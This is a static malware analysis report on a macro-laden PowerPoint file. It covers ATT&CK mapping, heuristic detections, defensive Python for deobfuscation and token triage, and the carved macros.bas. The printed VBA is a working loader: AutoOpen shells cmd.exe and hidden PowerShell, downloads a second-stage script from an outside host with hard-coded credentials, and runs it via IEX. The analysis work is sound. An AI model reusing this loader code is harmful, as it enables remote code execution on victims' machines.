Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 66785fb31ae7dd28…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 30.2 KB
Created: 2019-11-22 12:29:11 UTC
Authoring application: Microsoft Office PowerPoint 15.0000
First seen: 2021-06-04
MD5: d878844caf16323c02a3ebf04e0e3e53
SHA-1: 6e3de699f04a2c552d53635df91793811ba5b7cf
SHA-256: 66785fb31ae7dd28da8e421118288dabc8458c8e2b570c651e4e4db8ce451dd5
Risk score: 270

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File
  • T1071.001 Application Layer Protocol: Web Protocols

The sample contains a VBA macro whose AutoOpen subroutine calls LaunchMacroPPT, which runs payload() and then quits PowerPoint through GetObject("PowerPoint.Application").Quit. payload() assembles a command line from seven concatenated string variables (a simple string-splitting obfuscation) and hands it to Shell(): cmd.exe /c launches powershell -NoP -sta -NonI, which uses System.Net.WebClient to download a second-stage script from 'https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1', authenticating with HTTP Basic credentials hard-coded in the macro (user 'aiq_mlwre_scenarios'). The downloaded text is hashed with MD5 and compared against the embedded value 'b5fc4be33ae7ede9c221cd70a3f8497c'; only on a match is it executed with Invoke-Expression (IEX), otherwise the process exits with -1 (download failed) or -2 (hash mismatch). This check pins the loader to one specific payload version; it is not an integrity protection for the victim. The Shell() call and the cmd.exe reference are the execution primitives that the heuristics below key on. One caveat on the trigger: AutoOpen is a Word auto-execution name, and PowerPoint does not run it automatically when a presentation is opened, so with the authoring application recorded as PowerPoint the macro's own comment ('triggered when PowerPoint generator is used') is the only indication of how execution is meant to start.
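The concatenation obfuscation is easy to undo mechanically, and doing so yields every IOC in one place. The following is an added worked example written for this report (it is not the analysis engine's code and not part of the sample): it parses the Dim-assignments of the payload() routine copied from the macros.bas artifact below, resolves the operands of the Shell() call in order, the way VBA's & operator does at run time, and then pulls the URL, the Basic-auth credentials, the expected MD5 and the PowerShell switches out of the rebuilt command line. The regular expressions and the output field names are my own choices.

```python
"""Rebuild the Shell() command line from chained VBA string variables and
extract the IOCs from the resulting PowerShell one-liner.

Added example for this report; not part of the sample or of any tool.
VBA_PAYLOAD is the payload() routine copied from the extracted macros.bas."""
import re
from typing import Dict, List

VBA_PAYLOAD = r'''Private Sub payload()
  Dim a: a = "C:\Windows\System32\cmd.exe"
  Dim b: b = " /c powershell -NoP -sta -NonI"
  Dim c: c = " function get-hash([string]$textToHash){ $hasher = new-object System.Security.Cryptography.MD5CryptoServiceProvider; $toHash = [System.Text.Encoding]::UTF8.GetBytes($textToHash); $hashByteArray = $hasher.ComputeHash($toHash); foreach($byte in $hashByteArray) {$result += '{0:X2}' -f $byte};return $result;}"
  Dim d: d = " try{$webclient = new-object System.Net.WebClient;$credCache = new-object System.Net.CredentialCache;$creds = new-object System.Net.NetworkCredential('aiq_mlwre_scenarios','nTrBxu74T8u9');$credCache.Add('https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1', 'Basic', $creds);$webclient.Credentials = $credCache;"
  Dim e: e = " $e=$webclient.DownloadString('https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1');}"
  Dim f: f = " catch [Net.WebException]{'Download failed'; exit -1 }; if ((get-hash($e)) -eq 'b5fc4be33ae7ede9c221cd70a3f8497c') { IEX $e; }"
  Dim g: g = " else {'Invalid HASH for PowerShell script'; exit -2 }"
  PID = Shell(a & b & c & d & e & f & g)
End Sub
'''

# "Dim x: x = "..."" on one line; VBA escapes an embedded quote as "".
_DIM_RE = re.compile(r'^\s*Dim\s+(\w+)\s*:\s*\1\s*=\s*"(.*)"\s*$', re.MULTILINE)
_SHELL_RE = re.compile(r'Shell\(([^)]*)\)')
_URL_RE = re.compile(r'''https?://[^\s'"<>]+''')
_CRED_RE = re.compile(r"NetworkCredential\('([^']*)'\s*,\s*'([^']*)'\)")
_MD5_RE = re.compile(r"-eq\s*'([0-9a-fA-F]{32})'")
_PS_FLAGS_RE = re.compile(r'powershell((?:\s+-\w+)+)', re.IGNORECASE)


def rebuild_shell_command(vba: str) -> str:
    """Resolve the operands of Shell(...) against the Dim-assigned string
    variables and concatenate them in source order."""
    fragments = {name: val.replace('""', '"') for name, val in _DIM_RE.findall(vba)}
    m = _SHELL_RE.search(vba)
    if m is None:
        raise ValueError("no Shell() call found")
    parts: List[str] = []
    for operand in m.group(1).split('&'):
        operand = operand.strip()
        if operand.startswith('"') and operand.endswith('"'):   # literal operand
            parts.append(operand[1:-1].replace('""', '"'))
        else:                                                   # variable operand
            parts.append(fragments[operand])
    return ''.join(parts)


def extract_iocs(cmdline: str) -> Dict[str, object]:
    """Pull network and execution indicators out of the rebuilt command."""
    urls: List[str] = []
    for url in _URL_RE.findall(cmdline):
        if url not in urls:
            urls.append(url)
    cred = _CRED_RE.search(cmdline)
    md5 = _MD5_RE.search(cmdline)
    flags = _PS_FLAGS_RE.search(cmdline)
    return {
        "urls": urls,
        "basic_auth": (cred.group(1), cred.group(2)) if cred else None,
        "expected_md5": md5.group(1).lower() if md5 else None,
        "powershell_flags": flags.group(1).split() if flags else [],
        "uses_iex": re.search(r'\b(?:IEX|Invoke-Expression)\b', cmdline, re.IGNORECASE) is not None,
    }


if __name__ == "__main__":
    command = rebuild_shell_command(VBA_PAYLOAD)
    print(command)
    for key, value in extract_iocs(command).items():
        print(f"{key}: {value}")
```

Two details of the PowerShell stage that the rebuilt command makes visible: get-hash formats bytes with '{0:X2}' (uppercase hex) while the embedded hash is lowercase, which works only because PowerShell's -eq on strings is case-insensitive; and the same URL is used twice, once as the CredentialCache key for the Basic-auth credential and once in DownloadString, so a defender blocking the host breaks the loader before the hash check is reached.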

Heuristics (8)

  • VBA project inside OOXML (medium, OOXML_VBA, 6 related findings)
    Document contains a VBA project: VBA macros are present.
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched lines in script:
      Dim g: g = " else {'Invalid HASH for PowerShell script'; exit -2 }"
      PID = Shell(a & b & c & d & e & f & g)
    End Sub
  • PowerShell reference in VBA (critical, OLE_VBA_PS)
    Matched lines in script:
      Dim a: a = "C:\Windows\System32\cmd.exe"
      Dim b: b = " /c powershell -NoP -sta -NonI"
      Dim c: c = " function get-hash([string]$textToHash){ $hasher = new-object System.Security.Cryptography.MD5CryptoServiceProvider; $toHash = [System.Text.Encoding]::UTF8.GetBytes($textToHash); $hashByteArray = $hasher.ComputeHash($toHash); foreach($byte in $hashByteArray) {$result += '{0:X2}' -f $byte};return $result;}"
  • GetObject call (high, OLE_VBA_GETOBJ)
    Matched lines in script:
    On Error Resume Next
    Set powerPointApp = GetObject(Class:="PowerPoint.Application")
    If Not powerPointApp Is Nothing Then powerPointApp.Quit
  • cmd.exe reference in VBA (high, OLE_VBA_CMD)
    Matched lines in script:
    Private Sub payload()
      Dim a: a = "C:\Windows\System32\cmd.exe"
      Dim b: b = " /c powershell -NoP -sta -NonI"
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code / performance-cache) stream contains an auto-execution token together with shell, download or object-execution tokens. This rule covers p-code-only documents and documents whose VBA source could not be extracted, where no readable macro source is available to the source-level rules above; for this sample the source was extracted and the rule fires in addition to them.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched lines in script:
    ' triggered when PowerPoint generator is used
    Sub AutoOpen()
        LaunchMacroPPT
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1
    Channel: in document text (OOXML body / shared strings). The same URL is also hard-coded in the macro's PowerShell command (see the PowerShell reference finding above and the extracted macros.bas).
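The per-token rules above (OLE_VBA_SHELL, OLE_VBA_PS, OLE_VBA_CMD, OLE_VBA_GETOBJ, OLE_VBA_AUTOOPEN) and the co-occurrence rule OLE_VBA_PCODE_AUTOEXEC_EXEC share one idea: an auto-execution entry point on its own is low severity, execution primitives on their own are suspicious, and the two together are what lifts the finding to high. The block below is an added example written for this report that implements that triage logic; it is not the scanner's own code. The token lists, category names and the NUL-stripping trick for UTF-16LE identifiers are my own simplifications (a production engine uses far larger keyword tables and, for p-code, a real disassembler), and the input streams are constructed, not carved from the analysed file.

```python
"""Auto-exec / execution-token co-occurrence triage for VBA streams.

Added example for this report, not the scanner's own code. Token lists
approximate the rules in the heuristics list; samples are constructed."""
import re
from typing import Dict, List

# Entry points that run without user interaction (Word/Excel/PowerPoint names).
AUTOEXEC_TOKENS = ["AutoOpen", "Auto_Open", "Document_Open", "Workbook_Open",
                   "AutoExec", "AutoClose", "Document_Close", "Workbook_Close"]

# Execution and download primitives by category. Corresponding rule ids in the
# report: shell -> OLE_VBA_SHELL, powershell -> OLE_VBA_PS, cmd -> OLE_VBA_CMD,
# object -> OLE_VBA_GETOBJ; "download" is my own extra category.
EXEC_TOKENS: Dict[str, List[str]] = {
    "shell": [r"\bShell\s*\(", r"\bWScript\.Shell\b"],
    "powershell": [r"\bpowershell\b"],
    "cmd": [r"\bcmd\.exe\b"],
    "object": [r"\bGetObject\s*\(", r"\bCreateObject\s*\("],
    "download": [r"\bDownloadString\b", r"\bDownloadFile\b",
                 r"\bURLDownloadToFile\b", r"https?://"],
}


def _views(blob: bytes) -> List[str]:
    """Two text views of a stream: the raw bytes as latin-1 (a 1:1 byte-to-char
    mapping, so decoded VBA source is searched as-is) and the same bytes with
    NULs stripped, which crudely exposes UTF-16LE strings such as the
    identifiers stored in compiled VBA tables."""
    return [blob.decode("latin-1"), blob.replace(b"\x00", b"").decode("latin-1")]


def _present(pattern: str, views: List[str]) -> bool:
    return any(re.search(pattern, view, re.IGNORECASE) for view in views)


def scan_stream(blob: bytes) -> Dict[str, object]:
    """Return the auto-exec names and execution categories found, plus the
    co-occurrence verdict that the high-severity rule is built on."""
    views = _views(blob)
    autoexec = [tok for tok in AUTOEXEC_TOKENS
                if _present(r"\b" + re.escape(tok) + r"\b", views)]
    execution = sorted(cat for cat, patterns in EXEC_TOKENS.items()
                       if any(_present(p, views) for p in patterns))
    return {
        "autoexec": autoexec,
        "execution": execution,
        "autoexec_with_exec": bool(autoexec) and bool(execution),
    }


# Constructed samples (not carved from the analysed document).
SAMPLES: Dict[str, bytes] = {
    "autoopen_shell": b'Sub AutoOpen()\r\n  PID = Shell("cmd.exe /c powershell -NoP")\r\nEnd Sub\r\n',
    "autoopen_only": b'Sub Document_Open()\r\n  MsgBox "hello"\r\nEnd Sub\r\n',
    "exec_only": b'Private Sub helper()\r\n  Set o = CreateObject("WScript.Shell")\r\nEnd Sub\r\n',
    # UTF-16LE identifiers with no ASCII source, as in a p-code-only module.
    "utf16_pcode_like": "AutoOpen\r\nShell(".encode("utf-16le"),
}


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, scan_stream(blob))
```

Only the first and last samples produce the co-occurrence verdict: a bare Document_Open handler and a helper that merely creates WScript.Shell each trip a single rule but not the combined one, which is the grading the report's severities reflect.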

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1702 bytes
SHA-256: d778b42bf40f3fd4b179a05dde93f36d09d5756ed978d201b98addeec0937017
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Módulo1"

Private Sub payload()
  Dim a: a = "C:\Windows\System32\cmd.exe"
  Dim b: b = " /c powershell -NoP -sta -NonI"
  Dim c: c = " function get-hash([string]$textToHash){ $hasher = new-object System.Security.Cryptography.MD5CryptoServiceProvider; $toHash = [System.Text.Encoding]::UTF8.GetBytes($textToHash); $hashByteArray = $hasher.ComputeHash($toHash); foreach($byte in $hashByteArray) {$result += '{0:X2}' -f $byte};return $result;}"
  Dim d: d = " try{$webclient = new-object System.Net.WebClient;$credCache = new-object System.Net.CredentialCache;$creds = new-object System.Net.NetworkCredential('aiq_mlwre_scenarios','nTrBxu74T8u9');$credCache.Add('https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1', 'Basic', $creds);$webclient.Credentials = $credCache;"
  Dim e: e = " $e=$webclient.DownloadString('https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1');}"
  Dim f: f = " catch [Net.WebException]{'Download failed'; exit -1 }; if ((get-hash($e)) -eq 'b5fc4be33ae7ede9c221cd70a3f8497c') { IEX $e; }"
  Dim g: g = " else {'Invalid HASH for PowerShell script'; exit -2 }"
  PID = Shell(a & b & c & d & e & f & g)
End Sub

Private Sub LaunchMacroPPT()
    payload
    ClosePowerPoint
End Sub

' triggered when PowerPoint generator is used
Sub AutoOpen()
    LaunchMacroPPT
End Sub

Public Sub ClosePowerPoint()

Dim powerPointApp As Object

On Error Resume Next
Set powerPointApp = GetObject(Class:="PowerPoint.Application")
If Not powerPointApp Is Nothing Then powerPointApp.Quit

End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: ppt/vbaProject.bin
Size: 10752 bytes
SHA-256: eabd78152aa15e688141c123359089bae6812919058d65f84b10762cc8809e59